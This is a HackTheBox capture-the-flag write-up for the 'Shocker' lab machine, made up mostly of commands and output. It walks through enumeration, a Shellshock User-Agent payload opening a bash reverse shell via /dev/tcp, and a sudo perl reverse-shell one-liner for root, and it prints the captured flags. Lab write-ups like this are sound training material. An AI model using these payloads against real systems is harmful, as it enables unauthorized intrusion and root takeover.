HackTheBox Shocker
Writeup for HackTheBox Shocker
Machine Synopsis
Shocker, while fairly simple overall, demonstrates the severity of the renowned Shellshock exploit, which affected millions of public-facing servers. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
$ nmap -sC -sV -A 10.10.10.56
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Here is the website.
dirsearch revealed some hidden directories.
1
2
3
4
5
6
7
8
$ dirsearch -u 10.10.10.56 -w /usr/share/dirb/wordlists/common.txt
...
[20:21:28] Starting:
[20:21:30] 403 - 294B - /cgi-bin/
[20:21:34] 200 - 137B - /index.html
[20:21:40] 403 - 299B - /server-status
Task Completed
Let’s check out the /cgi-bin/ directory.
A CGI-bin is a folder used to house scripts that will interact with a Web browser to provide functionality for a Web page or website
Let’s run dirsearch again on the /cgi-bin/ directory with some common extensions like sh, cgi, bash.
1
2
3
4
5
$ dirsearch -u http://10.10.10.56/cgi-bin -w /usr/share/dirb/wordlists/common.txt -f -e sh,cgi,bash
...
[20:28:10] Starting:
[20:29:19] 200 - 119B - /cgi-bin/user.sh
...
There is a very interesting user.sh file.
1
2
3
4
5
6
$ curl 10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
07:31:03 up 30 min, 0 users, load average: 0.00, 0.02, 0.00
Exploitation
Googling for cgi bin exploits resulted in a vulnerability called ShellShock.
According to this GitHub repository, we can check for the exploit by adjusting the User Agent to have some bash command.
Let’s send a reverse shell bash script to gain access to shelly.
1
User Agent: () { :; }; echo; /bin/bash -c "exec bash -i &>/dev/tcp/<ip>/<port> <&1"
1
2
3
4
5
6
7
8
$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 44040
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ cd /home/shelly
shelly@Shocker:/home/shelly$ cat user.txt
2ec24e11320026d1e70ff3e16695b233
Privilege Escalation
Let’s check what sudo privileges can shelly run.
1
2
3
4
5
6
7
8
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
It seems like she can run perl. We can run a reverse shell command with perl.
1
sudo /usr/bin/perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1
2
3
4
5
6
7
8
9
$ nc -nlvp 6969
listening on [any] 6969 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 41834
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root
# cat root.txt
52c2715605d70c7619030560dc1ca467